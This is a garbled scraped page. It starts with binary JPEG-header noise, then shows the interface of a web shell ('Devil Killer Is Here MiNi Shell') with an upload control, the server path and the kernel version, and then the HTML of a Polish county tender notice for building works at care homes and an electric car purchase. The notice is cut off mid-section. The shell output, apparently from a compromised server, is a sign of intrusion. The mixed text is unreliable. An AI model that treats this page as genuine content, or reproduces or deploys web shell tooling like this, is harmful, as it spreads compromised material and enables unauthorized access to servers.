JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240708/0040151401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> MODERNIZACJA INFRASTRUKTURY SPOŁECZNEJ W POWIECIE KOSZALIŃSKIM </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT KOSZALIŃSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330920854</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Racławicka 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Koszalin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">75-620</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">947140189</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@powiat.koszalin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">powiat.koszalin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> MODERNIZACJA INFRASTRUKTURY SPOŁECZNEJ W POWIECIE KOSZALIŃSKIM </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-39f9e93a-379c-11ef-b37c-4e696a6d8c25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00401514</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00030849/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 MODERNIZACJA INFRASTRUKTURY SPOŁECZNEJ W POWIECIE KOSZALIŃSKIM W RAMACH DOFINANSOWANIA INWESTYCJI Z RZĄDOWEGO FUNDUSZU POLSKI ŁAD: PROGRAMU INWESTYCJI STRATEGICZNYCH NR EDYCJA 8/2023/887/PolskiLad</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiat_koszalin <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcą w niniejszym postępowaniu o udzielenie zamówienia, odbywa się w języku polskim za pośrednictwem Platformy zakupowej tj.: platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/powiat_koszalin<br/>Zamawiający rekomenduje, aby komunikacja pomiędzy Zamawiającym a Wykonawcą odbywała się za pośrednictwem Platformy zakupowej. Zamawiający dopuszcza opcjonalnie komunikację za pośrednictwem poczty elektronicznej: adres poczty elektronicznej Zamawiającego: zamowienia.publiczne@powiat.koszalin.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacje o wymaganiach technicznych i organizacyjnych dotyczące korespondencji elektronicznej opisane zostały: w Regulaminie Platformy i Instrukcjach korzystania z Platformy dostępnych pod adresem: platformazakupowa.pl w zakładkach „Regulamin” i „Instrukcje” oraz w Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.<br/><br/>Komunikacja poprzez przycisk na Platformie (https://platformazakupowa.pl/pn/powiat_koszalin) „Wyślij wiadomość do Zamawiającego” umożliwia dodanie do treści wysyłanej wiadomości plików lub spakowanego folderu. <br/>Limit ilości i objętości plików lub spakowanych folderów wynosi: ilość plików lub spakowanych folderów: maksymalnie 10; objętość plików lub spakowanych folderów: maksymalnie 500 MB.<br/><br/>Ofertę w niniejszym postępowaniu należy złożyć za pośrednictwem „Formularza” do składania oferty dostępnego na Platformie (https://platformazakupowa.pl/pn/powiat_koszalin).<br/>Limit ilości i objętości plików lub spakowanych folderów przesyłanych za pośrednictwem zamieszczonego na Platformie „Formularza” przeznaczonego do złożenia lub zmiany oferty wynosi: ilość plików lub spakowanych folderów: maksymalnie 10; objętość plików lub spakowanych folderów: maksymalnie 150 MB.<br/><br/>Sposób pakowania plików znajduje się w Instrukcji „Jak pakować pliki o dużym rozmiarze” zamieszczonej na Platformie pod adresem: platformazakupowa.pl w zakładce „Instrukcje”.<br/><br/>Informacje dotyczące wymogu użycia podpisu elektronicznego znajdują się w Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązek informacyjny w dokumentach zamówienia tj. w Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający realizuje obowiązek informacyjny w dokumentach zamówienia, tj. w Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.272.3.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje prace konserwatorskie, budowlane i odtworzeniowe dachu i budynku domu pomocy społecznej (DPS) w Nowych Bielicach wraz z dostosowaniem infrastruktury dla potrzeb osób z niepełnosprawnościami. <br/><br/>Przedmiot zamówienia obejmuje w szczególności następujące zadania:<br/>1)	ZADANIE NR 1 - roboty remontowe i renowacyjne dachu budynku pałacowego dotyczące głównie: <br/>- naprawy więźby dachowej, <br/>- naprawy pokrycia dachu z jego konserwacją, <br/>- wykonanie instalacji odprowadzenia wód opadowych z połaci dachu (kosze, obróbki blacharskie, rynny, rury spustowe itp.), <br/>- renowacji kominów i elementów wentylacji dachowej; <br/>2)	ZADANIE NR 2 - wymiana istniejącej windy o napędzie hydraulicznym na nowy dźwig osobowy elektryczny w istniejącym szybie w budynku głównym-pałacowym;<br/>3)	ZADANIE NR 3 - wykonanie przy budynku pałacu od strony ogrodu robót budowlanych dotyczących: <br/>- remontu tarasu wraz z wymianą drzwi wyjściowych na taras, <br/>- przebudowy schodów zewnętrznych, <br/>- przebudowy części chodnika z kostki betonowej, <br/>- budowy podjazdu dla niepełnosprawnych.<br/><br/>Szczegółowe określenie zakresu i ilości robót objętych przedmiotem zamówienia zawarte jest w przedmiarach robót, dokumentacjach projektowych, Specyfikacjach Technicznych Wykonania i Odbioru Robót /zał. nr 6 do SWZ/. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45313000-4 - Instalowanie wind i ruchomych schodów</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45262600-7 - Różne specjalne roboty budowlane</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">450 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z zapisami Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">OKRES GWARANCJI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje prace remontowe i roboty związane z poprawą efektywności energetycznej budynków DPS w Żydowie wraz z budową na ich potrzeby odnawialnych źródeł energii (OZE).<br/><br/>Przedmiot zamówienia obejmuje w szczególności następujące zadania:<br/>1)	ZADANIE NR 1 - roboty termomodernizacyjne, instalacyjne i budowlane dotyczące:<br/>a)	termomodernizacji budynków A, B, C, D obejmującej swym zakresem <br/>w szczególności: <br/>	przygotowanie powierzchni ścian i ich ocieplenie styropianem wraz <br/>z wykonaniem wyprawy na elewacji i montażem okładziny ściennej winylowej, <br/>	demontaż i montaż części stolarki, <br/>	wymianę parapetów, <br/>	obróbki blacharskie; <br/>b)	wykonania instalacji klimatyzacji w pomieszczeniu kuchni w budynku B;<br/>c)	wymiany armatury grzejnikowej i regulacji instalacji wodnej, niskotemperaturowej;<br/>d)	wykonania wewnętrznej instalacji wentylacji mechanicznej nawiewno–wywiewnej pomieszczeń palarni w budynkach A i D;<br/>e)	przebudowy wejścia do kotłowni z budową żelbetowych schodów zewnętrznych na gruncie;<br/>f)	budowy nowego wejścia do piwnicy pod kuchnią w budynku B wraz ze schodami zewnętrznymi, montażem stolarki drzwiowej, robotami wykończeniowymi.<br/>2)	ZADANIE NR 2 - modernizacja źródła ciepła polegająca w szczególności na: <br/>a)	montażu gruntowych inwerterowych pomp ciepła o mocy 260kW typu B-W na potrzeby ogrzewania, wentylacji mechanicznej i podgrzania ciepłej wody użytkowej w budynkach A, B, C, D współpracujących w układzie biwalentnym - rozłącznym z istniejącą kotłownią olejową; <br/>b)	demontażu wraz z osprzętem jednego wodnego kotła Viessmann o mocy 575kW z palnikiem olejowym oraz sześciu powietrznych pomp ciepła.<br/>3)	ZADANIE NR 3 - wymiana istniejących utwardzeń terenu na nowe z kostki betonowej wraz z odwodnieniem i rekultywacją trawnika w otoczeniu budynków A, B, C, D.<br/><br/>Szczegółowe określenie zakresu i ilości robót objętych przedmiotem zamówienia zawarte jest w przedmiarach robót, dokumentacjach projektowych, Specyfikacjach Technicznych Wykonania i Odbioru Robót /zał. nr 7 do SWZ/. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">480 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z zapisami Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">OKRES GWARANCJI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia obejmuje zakup samochodu elektrycznego do obsługi infrastruktury społecznej. <br/><br/>2.	Wymagania dotyczące pojazdu:<br/>1)	pojazd musi być fabrycznie nowy i wyprodukowany z fabrycznie nowych elementów, nieużywany, niezarejestrowany, kompletny, wolny od wad fizycznych i prawnych oraz musi spełniać wymagania określone przez Zamawiającego w SWZ i załącznikach do SWZ;<br/>2)	pojazd musi posiadać kierownicę po lewej stronie;<br/>3)	pojazd nie może być pojazdem prototypowym; nie może pochodzić z serii próbnej; <br/>4)	pojazd musi być dopuszczony do ruchu drogowego na podstawie świadectwa zgodności WE wydanego zgodnie z obowiązującymi przepisami;<br/>5)	zakres niezbędnego wyposażenia pojazdu musi być zgodny z obowiązującymi w Polsce przepisami i normami, a zastosowane materiały i wyposażenie muszą posiadać odpowiednie atesty i certyfikaty;<br/>6)	nie dopuszcza się pojazdu z homologacją ciężarową.<br/><br/>3.	Szczegółowy opis przedmiotu zamówienia ujętego w CZĘŚCI III zamówienia został zawarty w załączniku nr 8 do SWZ i określa on minimalne wymagania Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144900-7 - Pojazdy elektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34110000-1 - Samochody osobowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">300 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z zapisami Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN WYKONANIA PRZEDMIOTU ZAMÓWIENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> DOTYCZY CZĘŚCI I ZAMÓWIENIA<br/> <br/>1.	Zgodnie z art. 57 pkt 2) ustawy Pzp o udzielenie zamówienia określonego w niniejszym postępowaniu mogą ubiegać się Wykonawcy, którzy spełniają następujące WARUNKI UDZIAŁU W POSTĘPOWANIU określone przez Zamawiającego dotyczące:<br/><br/>1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie określa warunku w tym zakresie.<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie określa warunku w tym zakresie.<br/><br/>3)	sytuacji ekonomicznej lub finansowej: Zamawiający nie określa warunku w tym zakresie.<br/><br/>4)	zdolności technicznej lub zawodowej: Zamawiający wymaga aby Wykonawca posiadał niezbędną wiedzę i doświadczenie do wykonania przedmiotu zamówienia w szczególności potwierdził, że:<br/><br/>w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie minimum jedno zamówienie o wartości min. 300 000,00 PLN brutto, które obejmowało wykonanie lub remont/przebudowę/nadbudowę/rozbudowę budynku/budynków obejmujące w szczególności swoim zakresem roboty ogólnobudowlane, w tym roboty dekarskie.<br/>LUB<br/>w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie dwa oddzielne zamówienia o łącznej wartości min. 300 000,00 PLN brutto, które obejmowały wykonanie lub remont/przebudowę/nadbudowę/rozbudowę budynku/budynków obejmujące w szczególności swoim zakresem roboty ogólnobudowlane, w tym roboty dekarskie.<br/><br/><br/>DOTYCZY 